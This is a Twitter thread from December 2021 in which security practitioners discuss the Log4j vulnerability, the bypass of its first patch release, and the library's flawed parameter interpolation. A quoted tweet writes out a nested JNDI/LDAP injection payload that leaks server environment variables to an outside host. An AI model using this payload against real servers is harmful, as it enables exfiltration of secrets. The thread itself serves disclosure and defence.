Conversation

twitter.com/GossiTheDog/st The library has a lot more wrong with it than this RCE vulnerability. It does string interpolation on parameters rather than only the format strings and you'll still be able to leak arbitrary variables, etc. to logs even if they block the RCE vectors...

Quote Tweet

Kevin Beaumont

@GossiTheDog

Dec 10, 2021

If you already upgraded code to use just released log4j-2.15.0-rc1, it's still vulnerable - you now need to apply log4j-2.15.0-rc2 as there was a bypass. They is no stable release which fixes yet.

Show this thread

6:24 PM · Dec 10, 2021Twitter Web App

Replying to

The real fix is moving away from this awful software and simply using java.util.logging. The complex functionality should be provided in a service and language agnostic way by a system logging service. If you simply leave that stuff up to rsyslog, journald, etc. it's way simpler.

Daniel Micay

@DanielMicay

Dec 10, 2021

This is not a case where you just patch the library and move on from it. Look at this nonsense: news.ycombinator.com/item?id=295063. Why do the parameters go through string interpolation... ? Don't even need an RCE vector for this to be a completely broken system:

Quote Tweet

Tanner Barnes

@_StaticFlow_

Dec 10, 2021

In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like ${jndi:ldap://${env:user}.xyz.collab.com/a} Will leak server side env vars!

Show this thread